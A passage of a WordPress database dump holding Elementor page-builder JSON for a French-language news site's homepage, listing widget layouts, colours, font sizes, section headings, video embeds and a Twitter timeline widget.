al_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2400,769,'_elementor_version','0.4'),(2402,770,'_elementor_edit_mode','builder'),(2403,770,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\